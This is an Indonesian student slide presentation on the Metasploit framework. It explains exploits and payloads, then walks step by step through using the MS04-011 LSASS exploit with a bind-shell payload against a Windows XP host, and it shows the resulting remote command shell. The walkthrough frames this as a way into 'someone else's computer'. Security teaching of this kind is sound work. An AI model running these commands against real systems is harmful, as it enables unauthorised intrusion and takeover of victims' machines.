30
Metasploit Hauliza Rindhayanti Kezia Velda Roberta William Gunawan

presentasi Metasploit

Embed Size (px)

Citation preview

Page 1: presentasi Metasploit

MetasploitHauliza RindhayantiKezia Velda RobertaWilliam Gunawan

Page 2: presentasi Metasploit

Metasploit

Pengenalan Metasploit Kegunaan Metasploit

Perintah Metasploit Keunggulan Metasploit

Command Metasploit

Advance Fitur

Metasploit Konsol

Metasploit GUI

Page 3: presentasi Metasploit

Pengenalan Metasploit• metasploit framework adalah sebuah

penetration tool yang cukup powerfull untuk melakukan penestrasi ke dalam sebuah system.

• metasploit framework bisa juga dikatakan sebagai sebuah platform pengembangan untuk membuat tool security dan exploit

Back to metasploit

Page 4: presentasi Metasploit

Pengenalan Metasploit• Metasploit framework sering dibuat dengan

menggunakan bahasa pemrograman Ruby

• Fungsi dasar dari metasploit framework adalah untuk memunculkan modul, membiarkan penggunanya mengkonfigurasikan modul exploit dan mencobanya pada target yang dituju

Page 5: presentasi Metasploit

Pengenalan MetasploitMetasploit biasa dikaitkan dengan istilah remote exploitation, maksudnya walaupun penyusup sistem berada pada jarak jangkauan yang jauh tetapi dapat mengendalikan komputer korban.

Metasploit menyerang dengan cara mengirimkan exploit yang berisi payload yang sudah ditentukan oleh penyusup sistem pada komputer korban.

Page 6: presentasi Metasploit

Pengenalan Metasploit Exploit merupakan software yang berfungsi untuk

memanfaatkan kelemahan pada software korban (misal web browser), setelah berhasil mengeksploitasinya exploit tersebut memasukkan payload ke dalam memori korban.

Walaupun exploit sering digunakan untuk menyerang kerapuhan keamanan (security vulnerability) yang spesifik namun tidak selalu bertujuan untuk melancarkan aksi yang tidak diinginkan. Banyak peneliti keamanan komputer menggunakan exploit untuk mendemonstrasikan bahwa suatu sistem memiliki kerapuhan.

Page 7: presentasi Metasploit

Pengenalan MetasploitPayload merupakan sebuah file executable milik penyusup

yang akan di run pada komputer korban dengan tujuan dapat mengendalikan komputer tersebut secara remote atau memasang backdoor, trojan, virus, worm, dan lain-lain.

Payload dapat disusupi setelah bug berhasil di exploitasi oleh Metasploit Framework. Misal kita pilih payload Generic/Shell_Bind_TCP , artinya kita akan mengambil alih Shell Bind dari target hacking kita

Page 8: presentasi Metasploit

Kegunaan Metasploit

Metasploit framework mempunyai banyak kegunaan dalam berbagai bidang diantaranya adalah :

Pada bidang keamanan jaringan untuk melakukan tes penetrasi

administrator sistem untuk memverifikasi instalasi dan patch sistemnya

vendor produk untuk melakukan tes kelemahan dan peneliti-peneliti keamanan lainnya di dunia

Page 9: presentasi Metasploit

Kegunaan Metasploit

Riset dan penelitian eksploitasi keamanan

memahami cara kerja serangan

Tes penetrasi

Tes IPS/IDS

Dema atau presentasi

Legal hacking Back to metasploit

Page 10: presentasi Metasploit

Perintah Metasploit

use exploitnameNama exploit yang di gunakan dalam exploit metasploit tersebut.

set RHOST hostname_or_ipUntuk mengetahui atau menginstuksikan target lewat remote host atau Ip target

set RPORT host_portUntuk mengatur port yang terhubung lewat remote host ke target tersebut.

set PAYLOAD linux/x86/shell_bind_tcpMengatur payload yang di gunakan lewat platform Linux x86 ke sebuah target ketika shell sudah terpasang.

Page 11: presentasi Metasploit

Perintah Metasploit set LPORT local_port

Menetapkan port di server yang akan di xploit atau target exploit / rexploit

Memanfaatkan kode dari web yang telah di eksekusi , Yupz reload exploit / rexploit memungkinkan perubahan kecil tanpa harus retart konsole tersebut.

sessionsIni untuk membantu agar kita bisa berinteraksi dengan berbagai remote shell yang sudah kita tanam di target / server.

show optionsUntuk mengatur exploit dan payload , show exploits dan show payloads juga dapat menampilkan exploit / payload yang telah di eksekusi.

Back to metasploit

Page 12: presentasi Metasploit

Keunggulan Metasploit Kompatibilitas User interface

metasploit mempunyai tampilan konsole yang interaktif, tampilan web yang dinamis, eksploitasi perintahnya interaktif,

Exploits Payloads auxiliary

Back to metasploit

Page 13: presentasi Metasploit

Command pada MetasploitBerikut ini beberapa contoh command pada metasploit :

Command : msf > help (digunakan untuk melihat perintah-perintah pada metasploit framework)

Page 14: presentasi Metasploit

Command : msf > show exploits (digunakan untuk mengetahui macam-macam exploit yang terkandung di dalam metasploit framework)

Page 15: presentasi Metasploit

Command : msf > show payloads (digunakan untuk mengetahui macam-macam payload yang terkandung di dalam metasploit framework)

Back to metasploit

Page 16: presentasi Metasploit

Metasploit KonsolBerikut ini beberapa langkah untuk masuk ke komputer orang lain :

1. Masuk ke konsol dengan menekan tombol CTRL+O.2. Setelah itu, maka akan muncul konsol spt ini

| | o _ _ _ _ _|_ __, , _ | | __ _|_ / |/ |/ | |/ | / | / \_|/ \_|/ / \_| | | | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/ /| \| =[ msf v3.1-release + -- --=[ 262 exploits - 117 payloads + -- --=[ 17 encoders - 6 nops =[ 46 aux msf >

Page 17: presentasi Metasploit

5. Untuk load modul exploit, kita gunakan exploit lsassmsf > use windows/smb/ms04_011_lsass

6. Tentukan sistem operasi yang digunakan target, misal : target menggunakan XP msf exploit(ms04_011_lsass) > set target 2 target => 2

7. Tampilkan semua payload yang ada pada metasploit Framework msf exploit(ms04_011_lsass) > show payloads

Page 18: presentasi Metasploit

8. karena kita ingin masuk ke dalam konsol, maka kita pilih payload generic/shell_bind_tcp. msf exploit(ms04_011_lsass) > set payload generic/shell_bind_tcp payload => generic/shell_bind_tcp

9. Selanjutnya, tentukan IP si target, misal IP target “192.168.113.14 “ msf exploit(ms04_011_lsass) > set RHOST 192.168.113.14 RHOST => 192.168.113.14

10. Kemudian,tinggal menjalankan perintah exploit... msf exploit(ms04_011_lsass) > exploit

Page 19: presentasi Metasploit

output dari command exploit : [*] Started bind handler [*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.113.14[\lsarpc]... [*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.113.14[\lsarpc]... [*] Getting OS information... [*] Trying to exploit Windows 5.1 [*] Command shell session 3 opened (192.168.113.25:8471 -> 192.168.113.14:4444) [*] The DCERPC service did not reply to our request

Dapat dilihat pada output terdapat tulisan “Command shell session 3 opened” yang berarti kita sudah berhasil masuk ke dalam komputer korban dan shell kita di simpan di session 3.

Page 20: presentasi Metasploit

11. Selanjutnya kita tampilkan isi sessionmsf exploit(ms04_011_lsass) > sessions -l

Active sessions =============== Id Description Tunnel -- ----------- ------ 3 Command shell 192.168.113.25:8471 -> 192.168.113.14:4444

12. Terakhir, kita masuk ke dalam session 3 tersebutmsf exploit(ms04_011_lsass) > sessions -i 3 [*] Starting interaction with 3... Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>

Back to metasploit

Page 21: presentasi Metasploit

Advanced Fitur Meterpreter PassiveX Payloads Chainable Proxies Win32 UploadExec Payloads Win32 DLL Injection Payloads VNC Server DLL Injection

Back to metasploit

Page 22: presentasi Metasploit

Metasploit GUIPilih modul exploits atau auxillary yang akan digunakan, double klik pada modul tersebut lalu ikuti langkah-langkahnya.

Page 23: presentasi Metasploit

KILLBILL SMB EXPLOIT

Page 24: presentasi Metasploit

Pilih target yang akan dieksploit

Page 25: presentasi Metasploit

Pilih Payloads yang akan digunakan

Page 26: presentasi Metasploit

Masukkan IP Target

Page 27: presentasi Metasploit

Confirm Setting

Page 28: presentasi Metasploit

Informasi Modul

Page 29: presentasi Metasploit

Output Modul

Page 30: presentasi Metasploit

TERIMA KASIH